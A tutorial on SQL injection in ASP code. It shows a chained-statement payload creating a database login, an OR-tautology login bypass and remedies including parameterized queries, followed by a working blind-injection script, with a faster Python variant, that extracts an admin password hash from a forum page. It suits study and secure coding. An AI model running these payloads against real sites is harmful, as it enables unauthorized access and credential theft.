In an ASP program, if the code is improperly designed, the database can end up under someone else's control. The following is a simple user password change.

Code
---------------------
username = Request("user_name")
pwd = Request("pwd")
username = Replace(username, "'", "''")
pwd = Replace(pwd, "'", "''")
SQL = "update tbl_test set pwd='" & pwd & "' where uid='" & username & "'"
Set rs1 = conn.Execute(SQL)
---------------------

Now suppose I register a user whose username is

    aa'; exec sp_addlogin 'haha

What happens when this user changes the password, say to pp? The statement sent to the database becomes

    update tbl_test set pwd='pp' where uid='aa'; exec sp_addlogin 'haha'

The result is that no password is modified, because there is no user aa, but a new login named haha has now been created in your database. The single quote in the username closed the string literal, and everything after the semicolon ran as a second statement. In fact, any SQL statement can be run this way, and all of it executes in the database server's own process without your knowledge. The above is only a demonstration: by adjusting the username a little, one can add a DBA account, delete every record, read user passwords, and perform other unauthorized operations. (Note that the two Replace calls double single quotes, which keeps this payload inside the literal when it arrives straight from the request; the attack succeeds wherever the registered username reaches the query without that escaping.)

Solution: test every parameter strictly before you use it. Check not only its data type and length but also its content.

Let's look at another piece of code (user login):

---------------------
username = Request("user_name")
pwd = Request("pwd")
username = Replace(username, "'", "''")
pwd = Replace(pwd, "'", "''")
SQL = "select uid, pwd from account where uid='" & username & "' and pwd='" & pwd & "'"
rs.Open SQL, conn, 1, 1
If Not rs.EOF Then
    Response.Write rs(0) & " Welcome, you have logged in successfully"
Else
    Response.Write "Login failed, incorrect username or password"
End If
............
---------------------

The vulnerability in this program is obvious.
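Added example (not code from the original article): the two attacks on the ASP code above, the chained statement in the password change and the a' or '1'='1 login bypass explained next, replayed in Python against an in-memory SQLite database, beside the row-comparison fix the article proposes and a parameterized query. The table names, the sample rows, and the logins table that stands in for what sp_addlogin creates on SQL Server are all constructed for this demonstration; sqlite3's executescript plays the role of ADO's conn.Execute, which hands a multi-statement batch to the server.

```python
import sqlite3

# Constructed schema and rows for the demo (not the article's tbl_test/account tables).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE account (uid TEXT PRIMARY KEY, pwd TEXT);
        CREATE TABLE logins  (name TEXT);   -- stands in for the server logins sp_addlogin creates
        INSERT INTO account VALUES ('admin', 's3cret'), ('bob', 'hunter2');
    """)
    return conn

def escape_quotes(value):
    # The article's Replace(s, "'", "''"): a doubled quote stays inside the string literal
    return value.replace("'", "''")

def change_password(conn, username, pwd):
    # "update tbl_test set pwd='...' where uid='...'" built by concatenation.
    # executescript is used because ADO's Execute, like SQL Server, runs a whole batch;
    # sqlite3's execute() would reject the second statement and hide the problem.
    sql = f"UPDATE account SET pwd='{pwd}' WHERE uid='{username}'"
    conn.executescript(sql)

def login_vulnerable(conn, username, pwd):
    # The article's login query: any returned row counts as a successful login
    sql = f"SELECT uid, pwd FROM account WHERE uid='{username}' AND pwd='{pwd}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_row_check(conn, username, pwd):
    # The article's proposed fix: accept only if the returned row equals what the user sent
    sql = f"SELECT uid, pwd FROM account WHERE uid='{username}' AND pwd='{pwd}'"
    row = conn.execute(sql).fetchone()
    if row is not None and row[0] == username and row[1] == pwd:
        return row[0]
    return None

def login_parameterized(conn, username, pwd):
    # Bound parameters: the values are never part of the SQL text, so no quoting can escape
    row = conn.execute("SELECT uid, pwd FROM account WHERE uid=? AND pwd=?",
                       (username, pwd)).fetchone()
    return row[0] if row else None

def logins(conn):
    return [r[0] for r in conn.execute("SELECT name FROM logins")]

def admin_password(conn):
    return conn.execute("SELECT pwd FROM account WHERE uid='admin'").fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    # First attack: a username that closes the literal and chains a second statement.
    # "INSERT INTO logins ... SELECT 'haha" plays the part of "exec sp_addlogin 'haha";
    # the query's own closing quote completes the literal, as in the article.
    payload = "aa'; INSERT INTO logins(name) SELECT 'haha"
    change_password(db, payload, "pp")
    print(logins(db), admin_password(db))      # ['haha'] s3cret: chained statement ran, no row updated
    change_password(db, escape_quotes(payload), "pp")
    print(logins(db))                          # still ['haha']: the doubled quote kept it one literal
    # Second attack: a tautology in the password field
    print(login_vulnerable(db, "admin", "a' OR '1'='1"))      # a user name: bypass works
    print(login_row_check(db, "admin", "a' OR '1'='1"))       # None: returned pwd != supplied pwd
    print(login_parameterized(db, "admin", "a' OR '1'='1"))   # None
    print(login_parameterized(db, "admin", "s3cret"))         # admin
```

The row comparison stops the tautology because the stored password can never equal the injected string, but the query is still assembled from user input; only the parameterized form removes the injection itself.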
We can log in as the administrator with the username admin and the password a' or '1'='1, because the SQL statement becomes

    select uid, pwd from account where uid='admin' and pwd='a' or '1'='1'

Since and binds more tightly than or, the condition uid='admin' and pwd='a' or '1'='1' is always true, so rs.EOF is False and the login succeeds. (As in the first example, the payload only reaches the query in this form when its single quote is not doubled.) The correct way to write the check is to compare what the database returns with what the user supplied:

---------------------
SQL = "select uid, pwd from account where uid='" & username & "' and pwd='" & pwd & "'"
rs.Open SQL, conn, 1, 1
If Not rs.EOF Then
    If rs(0) = username And rs(1) = pwd Then
        Response.Write rs(0) & " Welcome, you have logged in successfully"
    Else
        Response.Write "Login failed, incorrect username or password"
    End If
Else
    Response.Write "Login failed, incorrect username or password"
End If
---------------------

The Not rs.EOF guard is required: reading rs(0) on an empty recordset raises an error. This comparison blocks the tautology, but the statement is still assembled from user input, so the statement chaining shown in the first example remains possible; the real fix is the strict parameter check described above, or better, passing the values as parameters of an ADODB.Command instead of concatenating them.

---- Full text ----
' Do not use this code for illegal purposes. It is only meant to let ASP developers understand the principle and prevent it.

' Converts the byte array returned by XMLHTTP into a VBScript string.
' Bytes below &H80 are single-byte ASCII; anything else is treated as the first
' byte of a double-byte (GBK) character and combined with the byte that follows.
Function bytes2bstr(vIn)
    Dim strReturn
    Dim i, thisCharCode, nextCharCode
    strReturn = ""
    For i = 1 To LenB(vIn)
        thisCharCode = AscB(MidB(vIn, i, 1))
        If thisCharCode < &H80 Then
            strReturn = strReturn & Chr(thisCharCode)
        Else
            nextCharCode = AscB(MidB(vIn, i + 1, 1))
            strReturn = strReturn & Chr(CLng(thisCharCode) * &H100 + CInt(nextCharCode))
            i = i + 1
        End If
    Next
    bytes2bstr = strReturn
End Function

' Fetches a URL synchronously and returns the page body as text (empty on failure).
Function getHTTPPage(url)
    Dim http
    On Error Resume Next
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", url, False
    http.Send
    If http.readyState <> 4 Then
        Exit Function
    End If
    getHTTPPage = bytes2bstr(http.responseBody)
    Set http = Nothing
    If Err.Number <> 0 Then Err.Clear
End Function

' Returns True when the regular expression patrn matches strng (case-sensitive).
Function RegExpTest(patrn, strng)
    Dim regEx
    Set regEx = New RegExp          ' create the regular expression object
    regEx.Pattern = patrn           ' set the pattern
    regEx.IgnoreCase = False        ' match case-sensitively
    RegExpTest = regEx.Test(strng)
End Function

' Boolean-based blind extraction of the admin password hash, one character at a time.
password = ""
keyword = "Forum Homepage"                   ' text that appears on the page only when the injected condition is true
url1 = "http://QQ/BBS/list.asp?boardid=7 "   ' SQL injection entry point; the trailing space separates the injected clause
passlen = 32                                 ' an MD5 digest is 32 hex characters
Dim pass
pass = Array(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102)   ' ASCII codes of 0-9 and a-f
Server.ScriptTimeout = 999
For i = 1 To passlen
    flag = False
    ' The key step: ask whether the i-th character of the password has a given code.
    ' asc() and mid() are Access/JET functions. When the comparison is true the page
    ' shows the normal board listing (keyword present); when it is false it does not.
    url = url1 & "and (select asc(mid(password," & i & ",1)) from Admin where id>0)="
    For j = 0 To UBound(pass)
        str = getHTTPPage(url & pass(j))
        flag = RegExpTest(keyword, str)
        If flag = True Then
            password = password & Chr(pass(j))
            Exit For
        End If
    Next
Next
Response.Write password
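Added example (not the article's script): the same boolean-based blind extraction in Python, run against a constructed in-memory SQLite target so it works offline, together with a bisection variant that needs the same true/false oracle but far fewer requests than trying every candidate code. The Admin and board tables, the admin password letmein, the page text, and the request counter are all made up for this demonstration; unicode(substr()) is the SQLite spelling of the script's asc(mid()).

```python
import hashlib
import sqlite3

HEX = "0123456789abcdef"                            # alphabet of an MD5 hex digest
ADMIN_HASH = hashlib.md5(b"letmein").hexdigest()    # constructed target secret

def make_target():
    # Constructed schema: the board the page lists and the Admin table being attacked
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE board (boardid INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO board VALUES (7, 'General');
    """)
    conn.execute("INSERT INTO Admin VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    return conn

class TargetPage:
    """Stand-in for list.asp?boardid=...: pastes the parameter straight into the WHERE clause."""
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0          # counts "HTTP" requests so the two strategies can be compared

    def get(self, boardid_param):
        self.requests += 1
        sql = "SELECT name FROM board WHERE boardid=" + boardid_param
        try:
            row = self.conn.execute(sql).fetchone()
        except sqlite3.Error:
            return "Database error"
        return "Forum Homepage - " + row[0] if row else "No such board"

def oracle(page, condition):
    """True when the injected condition keeps the board row in the result (the keyword test)."""
    return "Forum Homepage" in page.get("7 and (" + condition + ")")

def char_at(i):
    # SQLite form of the script's (select asc(mid(password,i,1)) from Admin where id>0)
    return f"(select unicode(substr(password,{i},1)) from Admin where id>0)"

def extract_linear(page, length=32, alphabet=HEX):
    """The script's strategy: try every candidate code for each position, up to 16 requests per character."""
    out = ""
    for i in range(1, length + 1):
        for ch in alphabet:
            if oracle(page, f"{char_at(i)}={ord(ch)}"):
                out += ch
                break
        else:
            break              # nothing matched: value ended early or uses other characters
    return out

def extract_bisect(page, length=32, alphabet=HEX):
    """Same oracle, 5 requests per character: bisect the sorted alphabet, then confirm the match."""
    out = ""
    for i in range(1, length + 1):
        lo, hi = 0, len(alphabet) - 1
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(page, f"{char_at(i)}>={ord(alphabet[mid])}"):
                lo = mid
            else:
                hi = mid - 1
        # The confirm request catches end-of-string (substr gives '', unicode gives NULL,
        # every comparison is false) and characters outside the alphabet.
        if not oracle(page, f"{char_at(i)}={ord(alphabet[lo])}"):
            break
        out += alphabet[lo]
    return out

if __name__ == "__main__":
    lin, bis = TargetPage(make_target()), TargetPage(make_target())
    print(extract_linear(lin), lin.requests)
    print(extract_bisect(bis), bis.requests)
```

The linear scan costs one request per candidate until the right one turns up, so a digit-heavy hash is cheap and an f-heavy one expensive; the bisection always spends four requests to narrow sixteen candidates to one plus one to confirm, and the confirm step is also what lets it stop cleanly when the value is shorter than passlen.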